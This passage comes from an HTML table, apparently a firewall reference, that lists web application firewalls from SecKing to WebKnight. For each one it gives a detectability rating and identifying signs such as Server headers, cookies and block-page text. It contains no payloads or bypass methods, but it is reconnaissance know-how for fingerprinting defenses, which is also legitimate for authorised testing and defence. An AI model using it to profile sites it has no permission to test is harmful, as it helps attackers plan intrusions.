SecKing\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy/Moderate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header in response may contain:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eSECKINGWAF\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eSECKING/{version}\u003c/code\u003e field value.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n SecuPress\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse content may contain:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eSecuPress\u003c/code\u003e as text.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eBlock ID: Bad URL Contents\u003c/code\u003e as text.\u003c/li\u003e\n \u003c/ul\u003e\n \u003cli\u003eResponse code returned is \u003ccode\u003e503 Service Unavailable\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Secure Entry\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains value set to \u003ccode\u003eSecure Entry Server\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n SecureIIS\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse page contains either of the following text snippet:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eImage displaying \u003ccode\u003ebeyondtrust\u003c/code\u003e logo.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eDownload SecureIIS Personal Edition\u003c/code\u003e\u003c/li\u003e\n \u003cli\u003eReference to \u003ccode\u003ehttp://www.eeye.com/SecureIIS/\u003c/code\u003e URL.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eSecureIIS Error\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n SecureSphere\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eDifficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse page contains the following text snippet:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eError in \u003ccode\u003eh2\u003c/code\u003e text.\u003c/li\u003e\n \u003cli\u003eTitle contains only text as \u003ccode\u003eError\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eContact support for additional information.\u003c/code\u003e text.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n SEnginx\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains \u003ccode\u003eSENGINX-ROBOT-MITIGATION\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n ServerDefender VP\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response contains \u003ccode\u003eX-Pint\u003c/code\u003e header field with \u003ccode\u003ep80\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Shadow Daemon\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eDifficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains \u003ccode\u003erequest forbidden by administrative rules.\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n ShieldSecurity\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eDifficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains: \n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eYou were blocked by the Shield.\u003c/code\u003e text.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eSomething in the URL, Form or Cookie data wasn't appropriate\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eWarning: You have {number} remaining transgression(s) against this site\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eSeriously stop repeating what you are doing or you will be locked out\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n SiteGround\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eDifficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains\u003cbr\u003e \u003ccode\u003eThe page you are trying to access is restricted due to a security rule\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n SiteGuard (JP Secure)\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eDifficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse page contains:\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003ePowered by SiteGuard\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eThe server refuse to browse the page.\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eThe URL may not be correct. Please confirm the value.\u003c/code\u003e\u003c/li\u003e\n \u003c/ul\u003e \n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n SiteLock TrueShield\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page source contains the following:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eReference to \u003ccode\u003ewww.sitelock.com\u003c/code\u003e URL.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eSitelock is leader in Business Website Security Services.\u003c/code\u003e text.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003esitelock-site-verification\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003esitelock_shield_logo\u003c/code\u003e image.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n SonicWall\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contain \u003ccode\u003eSonicWALL\u003c/code\u003e keyword value.\u003c/li\u003e\n \u003cli\u003eBlocked response page contains either of the following text snippet:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eImage displaying \u003ccode\u003eDell\u003c/code\u003e logo.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eThis request is blocked by the SonicWALL.\u003c/code\u003e\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eWeb Site Blocked\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003ensa_banner\u003c/code\u003e as keyword. :p\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Sophos UTM \n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains \u003ccode\u003ePowered by UTM Web Protection\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n SquareSpace\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eDifficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse code returned is \u003ccode\u003e404 Not Found\u003c/code\u003e upon malicious requests.\u003c/li\u003e\n \u003cli\u003eBlocked response page contains either of the following text snippet:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eBRICK-50\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003e404 Not Found\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n SquidProxy IDS\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains field value \u003ccode\u003esquid/{version}\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003eBlocked response page contains\u003cbr\u003e \u003ccode\u003eAccess control configuration prevents your request from being allowed at this time.\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n StackPath\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eContains image displaying \u003ccode\u003eStackPath\u003c/code\u003e logo.\u003c/li\u003e\n \u003cli\u003eBlocked response page contains\u003cbr\u003e \u003ccode\u003eYou performed an action that triggered the service and blocked your request\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Stingray\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eDifficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response code returns \u003ccode\u003e403 Forbidden\u003c/code\u003e or \u003ccode\u003e500 Internal Error\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003eResponse headers contain the \u003ccode\u003eX-Mapping\u003c/code\u003e header field name.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Sucuri CloudProxy\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers may contain \u003ccode\u003eSucuri\u003c/code\u003e or \u003ccode\u003eCloudproxy\u003c/code\u003e keywords.\u003c/li\u003e\n \u003cli\u003eBlocked response page contains the following text snippet:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eAccess Denied - Sucuri Website Firewall\u003c/code\u003e text.\u003c/li\u003e\n \u003cli\u003eReference to \u003ccode\u003ehttps://sucuri.net/privacy-policy\u003c/code\u003e URL.\u003c/li\u003e\n \u003cli\u003eSometimes the email \u003ccode\u003ecloudproxy@sucuri.net\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003eContains copyright notice \u003ccode\u003e;copy {year} Sucuri Inc\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003cli\u003eResponse headers contains \u003ccode\u003eX-Sucuri-ID\u003c/code\u003e header along with normal requests.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Synology Cloud\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page has \u003ccode\u003eCopyright (c) 2019 Synology Inc. All rights reserved.\u003c/code\u003eas text.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Tencent Cloud\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response code returns \u003ccode\u003e405 Method Not Allowed\u003c/code\u003e error.\u003c/li\u003e\n \u003cli\u003eBlocked response page contains reference to \u003ccode\u003ewaf.tencent-cloud.com\u003c/code\u003e URL.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Teros\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eDifficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers contain cookie field \u003ccode\u003est8id\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n TrafficShield\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e might contain \u003ccode\u003eF5-TrafficShield\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eASINFO=\u003c/code\u003e value might be detected in response cookies.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n TransIP\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers contain unique header \u003ccode\u003eX-TransIP-Backend\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003eResponse headers contain another header \u003ccode\u003eX-TransIP-Balancer\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n UCloud UEWaf\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse content might contain:\n \u003cul\u003e\n \u003cli\u003eReference to \u003ccode\u003e/uewaf_deny_pages/default/img/\u003c/code\u003e inurl directory.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eucloud.cn\u003c/code\u003e URL.\u003c/li\u003e\n \u003c/ul\u003e \n \u003cli\u003eResponse headers returned has \u003ccode\u003eServer\u003c/code\u003e header set to \u003ccode\u003euewaf/{version}\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n URLMaster SecurityCheck\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers might contain:\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eUrlMaster\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eUrlRewriteModule\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eSecurityCheck\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e \n \u003cli\u003eBlocked response code returned is \u003ccode\u003e400 Bad Request\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n URLScan\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003c/li\u003e\n \u003cli\u003eBlocked response page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eRejected-by-URLScan\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eServer Erro in Application\u003c/code\u003e as heading.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eModule: IIS Web Core\u003c/code\u003e in table.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n USP Secure Entry\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers contain \u003ccode\u003eSecure Entry Server\u003c/code\u003e field value.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Varnish (OWASP)\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eMalicious request returns \u003ccode\u003e404 Not Found\u003c/code\u003e Error.\u003c/li\u003e\n \u003cli\u003eResponse page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eRequest rejected by xVarnish-WAF\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Varnish CacheWall\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eError 403 Naughty, not Nice!\u003c/code\u003e as heading.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eVarnish cache Server\u003c/code\u003e as text.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Viettel\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlock page has title set to \u003ccode\u003eAccess denied · Viettel WAF\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003eReference to \u003ccode\u003ehttps://cloudrity.com.vn/\u003c/code\u003e URL.\u003c/li\u003e\n \u003cli\u003eResponse page contains keywords \u003ccode\u003eViettel WAF system\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003eContact information reference to \u003ccode\u003ehttps://cloudrity.com.vn/customer/#/contact\u003c/code\u003e URL.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e \n \u003ctr\u003e\n \u003ctd\u003e\n VirusDie\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003ehttp://cdn.virusdie.ru/splash/firewallstop.png\u003c/code\u003e picture.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003ecopy; Virusdie.ru\u003c/p\u003e\u003c/code\u003e copyright notice.\u003c/li\u003e\n \u003cli\u003eResponse page title contains \u003ccode\u003eVirusdie\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003ePage metadata contains \u003ccode\u003ename=\"FW_BLOCK\"\u003c/code\u003e keyword\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n WallArm\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e headers contain \u003ccode\u003enginx-wallarm\u003c/code\u003e value.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n WatchGuard IPS\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e headers may contain \u003ccode\u003eWatchGuard\u003c/code\u003e field value.\u003c/li\u003e\n \u003cli\u003eBlocked response page contains: \u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eRequest denied by WatchGuard Firewall\u003c/code\u003e text.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eWatchGuard Technologies Inc.\u003c/code\u003e as footer.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n WebARX Security\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eRestricted to specifically WordPress sites only.\u003c/li\u003e\n \u003cli\u003eBlocked response page contains: \u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eThis request has been blocked by WebARX Web Application Firewall\u003c/code\u003e text.\u003c/li\u003e\n \u003cli\u003eReference to \u003ccode\u003e/wp-content/plugins/webarx/\u003c/code\u003e directory where it is installed.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n WebKnight\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers contain \u003ccode\u003eWebKnight\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003eBlocked response page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eWebKnight Application Firewall Alert\u003c/code\u003e text warning.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eAQTRONIX WebKnight\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003c/ul\u003e\n \u003cli\u003eBlocked response code returned is \u003ccode\u003e999 No Hacking\u003c/code\u003e. :p\u003c/li\u003e\n \u003cli\u003eBlocked response code returned is also \u003ccode\u003e404 Hack Not Found\u003c/code\u003e. :p\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n WebLand\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: 